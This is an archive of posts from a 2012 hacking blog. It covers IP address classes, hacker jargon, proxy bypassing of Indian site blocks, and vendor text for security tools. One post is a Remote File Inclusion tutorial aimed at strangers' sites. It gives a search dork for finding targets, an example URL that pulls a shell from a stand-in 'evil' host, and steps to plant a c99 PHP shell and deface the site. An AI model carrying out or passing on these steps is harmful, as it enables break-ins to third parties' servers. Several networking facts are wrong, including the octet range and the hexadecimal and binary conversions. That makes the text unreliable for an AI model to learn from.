Extension Factory Builder

Showing posts with label web hacking. Show all posts
Showing posts with label web hacking. Show all posts

Tuesday, 10 July 2012

Structure Of IP Address | classes of Ip Address | How to know Your ip address

In my Last post,You all know get to know about the Ip address and its Importance.Now,i will Begin with the structure of IP address,and then i will discuss about the methods,that how to get useful information about the victim's network.and how to represents a Ip address.


Structure Of ip Addresses

Ip address is a 32 bit address divided into 4 fields of 8 bits,each containing a number between 1 and 255 with a small pause between them.A normal Ip address might look like 203.94.35.12
.In the above ip address,->


203 represents first 8 bits
94 represents second 8 bits
35 represents third 8 bits
12 represents fourth 8 bits


Classes Of IP Address


Ip Addresses are Divided into Five Classes .On the Basis of these Classes,You can easily get some useful information about the victims network by simply viewing the Ip address.


          Class                                                                            Range
    
         Class A                                                                  0.0.0.0 - 126.255.255.255
         Class B                                                                  128.0.0.0-191.255.255.255
         Class C                                                                  192.0.0.0-223.255.255.255
         Class D                                                                   224.0.0.0-239.255.255.255
         Class E                                                                   240.0.0.0-255.255.255.255


From the above table ,You can Easily identify the class of ip Address for Any Known IP Address.For example- IP address 202.127.98.78 is a Class C Ip Address,Because the First 8 bits lie in the range of Class C Ip addresses.So you Only need to check only first 8 bits to know,in which class the given Ip address lies.

Now,You are able to know atleast the class of IP address,in which it lies.Now what information you can get from the ip address.?

For example-The Ip address is aa.bb.cc.dd 

1.If the ip address belongs to Class A,Then First 8 Bits would be used as network Id,and rest of the 24 bits belongs to host's id.
2.If the ip address belongs to Class B,then First 16 bits for network id,and rest 16 bits for Host's Id.
3.If the Ip address belongs to Class C,then first 24 bits for network id,and rest 8 bits for Host Id.
4.if the Ip address belongs to Class D,It Represents a 32 bit Multicast Group Id.
5.Class E IP address are not in use.

Now the question is,what do u get to know from the network id and host id.
network id can give you the idea,the how many networks exist .and it have a network id dis one.and host id give you information about the number of hosts in this particular network.to which victim's Ip  belongs.


How to Know Your Own Computer's IP address

Its very simple to know your owns computers ip address,by which,you can be contacted.or which is being recorded by the various websites,which you visits.or which helps the police to caught you,if you are doing any illegal or malicious activity on internet. i am sure,you must be ambicious to know it now.
Simply open the browser,and connect to the website www.whatismyip.com 
It will Display Your's own ip address like this:-


So,now You can Know your own ip Address,And practise to get infromation about your network using the method taught earlier in this post.This is your work now.if any problem arises,then please ask me in comments.

Representation of IP address

We can Represents Ip address in various forms,like octal,hexadecimal notation,etc.But We Usually express in Decimal Notation.Now i am going to discuss about the various representation of ip addresses by taking a live example:-
For Example -www.yahoo.com
Firstly we need to find its Ip address,
  1. Just Go to Run 
  2. And enter Cmd there,and press Ok.
  3. Write the command "ping www.yahoo.com".  
Decimal Notation of Ip address- 106.10.170.118
Domain Name server (DNS)- www.yahoo.com
Hexadecimal Representation of Ip address- 6AAAA76
Binary Representation of Ip adress- 110101010101010101001110110
Octal Representation of Ip address- 0152.012.0252.0166 (Note:- Prescribe every bit with 0)
Dword Representation of Ip address- 111848054(its a decimal notation of the hexadecimal in one)

Note:-You can use Programming Calculator In Windows Os To carry out These conversions

Trick of the Hacker: You can Use These Ip addresses,if some website is Blocked like in your schools,colleges and organizations.But some Browsers Some notations,some not.So try Well.Play with it.As much you try,you will gain some knowledge.

If Any Questions or Queries,Ask me in Comments,:-)

Wednesday, 4 July 2012

What Is Ip Address? | Anatomy Of Ip Address | Definition Internet Protocol Address


Anatomy Of IP Addresses


IP address is Internet Protocol address,which is unique address given to any computer or device connected to network or internet.

->Every System connected to a network has a unique Ip address associated with itself.
->All data sent or recieved by the system will be Addressed from or to its Ip Address
->Its a unique Identity of computer at which,it can be contacted.
->Ip address is just like a mobile number in real world-An identity can be contacted.

For example->just like in real world,the mobile phone number is there to contact you.its a unique number,like that only.ip address is in virtual world,which is used to address your computer on the network.

So If i am a Hacker,My first step is to Find the victim's Ip address,Before Attacking to it.Hence According to Security purposes,we Must Take Certain Countermeasures to hide your ip address,or hide your ip Address from the bad guyz,so that they might not break into your computer.

Do You Know?the Website you visit daily Records the Ip address of the visitors..?It means,someone is there in this world,who is watching you.And if You do any illegal work.u can be caught easily by just finding your ip address and just tracing it..
One more Example,i need to specify here To make you clear the importance of ip address.have you ever think,if you remember your password of your google account.Then.if you open the google.com ,then how the google automatically redirects to your account.and your every search keyword,clicks on the pages in search engine results is recorded in google database with your email address and Ip address.hence your Every moment on internet is watched.

Now you know the importance of the Ip address.In my next article ,you will study about the structure of ip address and how to get some useful information by just viewing the Ip Address.


Monday, 2 July 2012

Get a Job | Submit Your Resume Here | Jobs in IT companies | job for a hacker

Submit Your resume To get Placed in Reputed IT companies

To get a job in any field in the top most companies like google,yahoo.Post You Resume in  two websites given below,and shape your career in a way,you like.You can also post your cv or resume on these websites for the post of hacker.As 2005 survey conveys that-"every year india needs more than 78000 hackers"
Post for hackers can apply are-System administrator, network admininstrator ,IT networking manager,can apply in the field of security too.


Untitled Document

Market is bustling with Jobs; everyday top companies are hiring hundreds of deserving candidates by scouting them from TimesJobs.com.
Still waiting for your appraisal? It is time you jump on the bandwagon and get the hike you deserve.
1000s of new Job Opportunities have been recently posted on TimesJobs.com by top employers in IT, BFSI, Manufacturing & Engineering, Automobile and other growing industries.  Make the most out of this opportunity.
It is time to get the appraisal you deserve! Register now on TimesJobs.com
A Great Career & a better Salary await you!
Warm Regards,
TimesJobs.com
------------------------------------------------------------------------------------------------------------

Wednesday, 20 June 2012

Hacker vs Cracker | Difference between Hackers and Crackers

Hackers Vs Crackers

My Earlier post was about the Basic Definition of Hacker and Hacking and i also discussed that how to become a hacker.In this Post,i am Going to Discuss about the differences Between Hackers and Crackers.


Difference Between Hackers and Crackers


Hackers and Crackers are seems to be same words ,But a Great difference exists between Hackers and Crackers. First of all ,Hackers and Crackers have a same amount of knowledge and Experience,but the difference is about,How they are using their knowledge.Hackers are good guys,who use their Knowledge in positive direction.like hackers are appointed by companies and police to solve their problems or cases.On the other hand ,Crackers are Bad guys,who use their knowledge for Illegal and negative purposes.like Crackers stole the money from the bank by hacking into the bank's website.


             Hackers                                                                                 Crackers      
     
1. Lots of knowledge and experience                                            1.  Same amount of                                                                                              
about computers                                                                                  Knowledge and experience


2. Good Guy                                                                                     2. Bad guy


3. Strong Ethics                                                                               3.  Poor Ethics


4. No Crime commited                                                                    4.  Commits Crime


5. Fights Criminals,defend From                                                    5. They are Criminals
    Bad Crackers.

Tuesday, 19 June 2012

Who is a Hacker | Hacking Definition | How to Become a Hacker



I am Starting This tutorial With a simple question,which usually arise in my mind.and trust me,you must be having a wrong thinking about it.question is -Who is a Hacker? To get the ans to this Question.You need to know ,who is not a Hacker.So Hacker is not


1. A Criminal
2. The person who Releases Viruses
3. A Teenager sitting in a Dark Room eating pizzas and hacking into the fbi website.
4. Not always a Computer Related Person.means can also belongs to some other field too.
5. not even somebody,who can crack password to all the websites or softwares.
6. Not also,who stole the money from bank by hacking into bank Server.


By Knowing these things,u might be shocked,that if the person i have discussed above is not a hacker.then you might be thinking wrong about the term hacking or hacker.But this is not your fault.This False Misconceptions Has been Created by Media and Newspapers.So Now U all get to Knows Who Is not a Hacker.Now its Very easy for you to understand,Who Is a Hacker? 


Hacker Is who


1. The Person ,who thinks outside the box
2. who wants to Test His/Her Limits.
3. Who wants to try such things which are not given in manual.
4. Has Unlimites Curosity to work.
5. Who Discovers Unknown Features and Properties.
6. Someone who is dedicated to his knowledge
7. Highly Creative.
8. who Bellieves in Stretching the Limits.i.e who wants to test his/her limits,that upto what extent,He/she can go


After Reading This above discussed points on who is a Hacker.We can say That.All the Scientists,Discoverers,Mathematicians Can Fall under the Category of Hacking Or Hacker.Like Albert Einstein,Issac Newton.
One more Example i want to substitute Here,which will make you clear upto more extent,that Suppose The man,who rides the bike very fast,and he is very expert in driving and stunting,and making new stunts.Or A women who used to practise making of new Dishes in cooking.Then we can also say that,This man and woman is also a Hacker.
Now U must be having a Idea about who is a Hacker and who is not.Now i am Going to Discuss about the computer Hacker.Computer Hacker is one who Discovers new features ,discover bugs in software and help the company to Defend To being hacked.


Modern Day Hacker | How to Become a Hacker

If You want to Become a Hacker,You need to Follow these four points,which i am Providing Below.:-

1.You should be knowing Atleast one programming Language very Nicely.If i am Telling about programing language,then i must be talking about high level languages like C,C++,Etc

2.U should be Networking Guru.i.e You should knows the basics of networking,Means How the internet works,how the communcation sets up between two hosts,how the network is working.

3.you should know about the basics of unix or linux,as Unix is a heaven for hackers.u can go with linux,because unix only runs in server.and linux is GUI version of unix.

4.Last,But Not the Least Hacking Attitude-Criminal Mind.This is the One of the Major aspect to become a Hacker.that You should Think like a criminal.i.e like you should think how to crack into fb server while accessing your Fb account.

Now You must be knowing about the definitions, i think,all your misconceptions has been vanished now.If any Query,you can ask me in comments:-)

Monday, 18 June 2012

Access Banned Torrent and Video Sharing Sites in India:Working Method

Access Banned Torrent and Video Sharing Sites in India:Working Method

As we all know that,Indian Government had blocked various filesharing ,torrents and video sharing websites due to claim of pirated content on these websites.So Different Isp's has blocked different websites.But You can still Access Those websites,As Democratic Hackers Team had posted one method Few days ago.But i think,it has stop working in some states.Hence Democratic Hackers is back with some new tricks and tweets by which torrents and video sharing websites can be accessed in India.
i have discussed the mechanism of blockage of websites in my previous post of accessing blocked websites in india.
For example-you need to access thepiratebay which is famous torrent website.
If i try to access simply .then the webpage looks like this:-



1st Trick :
I want to discuss with you is simply use https inspite of http in url like https://thepiratebay.se.




It may happen ,that this trick might not work in accessing all the torrents website,as its working to access thepiratebay ,But it might not work for any other blocked website .For that Case,i am discussing the second trick,which is applicable to every case.
2nd Trick:
Just Use one Russian Proxy server.which is mantained by hackers,which is the most anonymous proxy server in the world.
The website is www.anonymizer.ru


Any Queries or questions,? Ask me in Comments:-)

Tuesday, 29 May 2012

How to Access Websites Blocked By indian Government | Access Torrent Websites In India | Access DailyMotion In India

How to Open Websites Blocked By indian Government | Access Torrent Websites In India | Access Daily Motion In India

As Indian Government Has ordered to block certain websites like dailymotion,torrents.eu,isohunt.com,all torrents websites,due to pirated content issue.But This is not the end here.As we can still access those our favourite websites By a simple method which i am going to teach you today.
We can access all blocked websites,First of all,i want to tell yo,these websites has been blocked by the isp(internet service providers).they had just redirected the page to one page showing "blocked as per court orders".they are using simple dns block method to block websites in india. We can Bounce over this simple firewall by using some nice anonymous proxy.


Follow some steps to access all blocked websites in india
1.open www.Zend2.com in your browser,zen2 is a famous proxy website,which will help you in bypassing the firewall which has been used by our ISP.
It will looks like:
2.Enter the url in above shown field"enter Url" which you want to access ,which has been blocked by your ISP.and click on go.For example i like to open www.torrentz.eu,which is largest torrents search engine.which has been blocked in india.



Note:This method can also be useful in conditions,if your school,college,office has blocked some websites,it may happen,if your calculations are correct,then you will be able to access you favourite websites in your area too.

Please Share,if you like my post:-)

Monday, 28 May 2012

Acunetix Web Vulnerability Scanner Free Download | Scan Your Webserver for vulnerabilities

Acunetix Web Vulnerability Scanner Free Download | Scan Your Webserver for vulnerabilities



Audit your website security with Acunetix Web Vulnerability Scanner
As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists.
Hackers are concentrating their efforts on web-based applications – shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases and also allow hackers to perform illegal activities
using the attacked site. A victim’s website can be used to launch criminal activities such as hosting phishing sites or to transfer illicit content, while abusing the website’s bandwidth and making its owner liable for these unlawful acts.



Firewalls, SSL and locked-down servers are futile against web application hacking!
Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right into the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.


Find out if your web site is secure before hackers download sensitive data, commit a crime using your web site as a launch pad, and endanger your business. Acunetix Web Vulnerability Scanner crawls your web site, automatically analyzes your web applications and finds perilous SQL injection, Cross site scripting and other vulnerabilities that expose your on line business. Concise reports identify where web applications need to be fixed, thus enabling you to protect your business from impending hacker attacks!
Acunetix Web Vulnerability Scanner includes many innovative features:

  • An automatic Javascript analyzer allowing for security testing of Ajax and Web 2.0 applications
  • Industry’s most a dvanced and in-depth SQL injection and Cross site scripting testing
  • Visual macro recorder makes testing web forms and password protected areas easy
  • Extensive reporting facilities including VISA PCI compliance reports
  • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
  • Automate File Upload Forms vulnerability testing
  • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
  • Innovative AcuSensor Technology that allows accurate scanning for many vulnerabilities
  • Port scanning and network alerts against the web server for complex security checks
Acunetix WVS automatically checks for the following vulnerabilities among others:
  • Version Check
    • Vulnerable Web Servers
    • Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution.
  • Web Server Configuration Checks
    • Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
    • Verify Web Server Technologies
  • Parameter Manipulation
  • Cross-Site Scripting (XSS) – over 40 different XSS variations are tested.
  • SQL Injection
  • Code Execution
  • Directory Traversal
  • File Inclusion
  • Script Source Code Disclosure
  • CRLF Injection
  • Cross Frame Scripting (XFS)
  • PHP Code Injection
  • XPath Injection
  • Path Disclosure (Unix and Windows)
  • LDAP Injection
  • Cookie Manipulation
  • Arbitrary File creation (AcuSensor Technology)
  • Arbitrary File deletion (AcuSensor Technology)
  • Email Injection (AcuSensor Technology)
  • File Tampering (AcuSensor Technology)
  • URL redirection
  • Remote XSL inclusion
  • MultiRequest Parameter Manipulation
  • Blind SQL/XPath Injection
  • File Checks
  • Checks for Backup Files or Directories – Looks for common files (such as logs, application traces, CVS web repositories)
  • Cross Site Scripting in URI
  • Checks for Script Errors
  • File Uploads
  • Unrestricted File uploads Checks
  • Directory Checks
  • Looks for Common Files (such as logs, traces, CVS)
  • Discover Sensitive Files/Directories
  • Discovers Directories with Weak Permissions
  • Cross Site Scripting in Path and PHPSESSID Session Fixation.
  • Web Applications
  • HTTP Verb Tampering
  • Text Search
  • Directory Listings
  • Source Code Disclosure
  • Check for Common Files
  • Check for Email Addresses
  • Microsoft Office Possible Sensitive Information
  • Local Path Disclosure
  • Error Messages
  • Trojan shell scripts (such as popular PHP shell scripts like r57shell, c99shell etc)Weak Passwords
  • Weak HTTP Passwords
  • GHDB Google Hacking Database
  • Over 1200 GHDB Search Entries in the Database
  • Port Scanner and Network Alerts
  • Port scans the web server and obtains a list of open ports with banners
  • Performs complex network level vulnerability checks on open ports such as:

    • DNS Server vulnerabilities (Open zone transfer, Open recursion, cache poisoning)
    • FTP server checks (list of writable FTP directories, weak FTP passwords, anonymous access allowed)
    • Security and configuration checks for badly configured proxy servers
    • Checks for weak SNMP community strings and weak SSL cyphers
    • and many other network level vulnerability checks!
  • Other vulnerability tests may also be preformed using the manual tools provided, including:
  • Input Validation
  • Authentication attacks
  • Buffer overflows
  • Blind SQL injection
  • Sub domain scanning


Search Terms: web vulnerability scanner,website security scanner,acunetix,acunetix wvs,website vulnerability scanning,vulnerability scanner,acunetix web vulnerability scanner,security scanner,website application scanner,sql injection scanner,sql vulnerability scanner,free,download

Saturday, 5 May 2012

Hack Websites | Deface Any Website | Remote File Inclusion Attack

Hack Websites | Deface Any Website | Remote File Inclusion Attack| Website Hacking

Hey friends...Now we will know about Website hacking method "Remote File Inclusion (RFI)" . This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.This  article is for Educational Purpose Only...so please Use this for knowledge Only !




This articles will be unserstandable mostly by web developers,or how know some web programming in html,php,asp etc...Lets start..


Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.



Normally, I'm against stuff like this. I believe people should find their own vulnerablesites. But, for the sake of this paper, i will show you how we can use google to get us vulnerable sites.


We will query google like so:

inurl:"index.php?page="


This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.

www.site.com/index.php?page=www.google.com


It is not nessesry that every site will work loke above statement....Only those will redirect to google,which having the security holes...
If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of a RFI:

this is an example only,There is no such sites or file....
www.shittysite.com/index.php?page=www.theevilhackerz.com/shell.txt?


A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable hosts url, like the example above.
D) You can then proceed to deface the site etc.


If you have any question or query  ,the feel free to ask..Post a comment here !
Thankyou,

Wednesday, 2 May 2012

Best browser for hackers with built in features for hackers-OWASP Mantra Browser Security Framework for penetration testers

Best browser for hackers with built in features for hackers- OWASP Mantra Browser Security Framework for penetration testers 





Mantra Browser is a most Recomended Browser for hackers and penetration Testers.it includes security framework which can be very useful to scan various web servers or websites for different attacks like sql injection and XSS attacks.

OWASP Mantra is such an innovative product, a security framework built on top of a browser. Its cross platform, portable and can run out of the box.You can take it with you where ever you go in absolutely any rewritable media including memory cards, flash drives and portable hard disks. More over, Mantra Browser can be used for both offensive security and defensive security related tasks which makes it incredible.
Mantra browser Developed on the firefox which is open source software by mozilla with a security framework.Developers Of mantra security toolkit Also Providing various Tools or addons which can be installed directly in the mantra browser.These Tools can help hackers or penetration testers to undego some work.
Mantra Browser Is Available For different Platforms -windows,linux32,linux64,macintosh.




Tools or Addons Available For Mantra Browser
 OWASP Mantra is a powerful set of tools to make the attacker's task easier. The beta version of Mantra Security Toolkit contains following tools built onto it. Moreover Mantra follows the guidelines and structure of FireCAT which makes it even more accessible. You can also always suggest any tools/ scripts that you would like see in the next release


1. Information Gathering Tools
2.Editors
3.Network Utilities
4.Application Auditing
5.Proxy-Anonymity
6.Miscellanous 


 For More Information :http://www.getmantra.com



Related Posts Plugin for WordPress, Blogger...
 
Submitdomainname.com Link Exchange with Democratic Hackers | Learn Ethical Hacking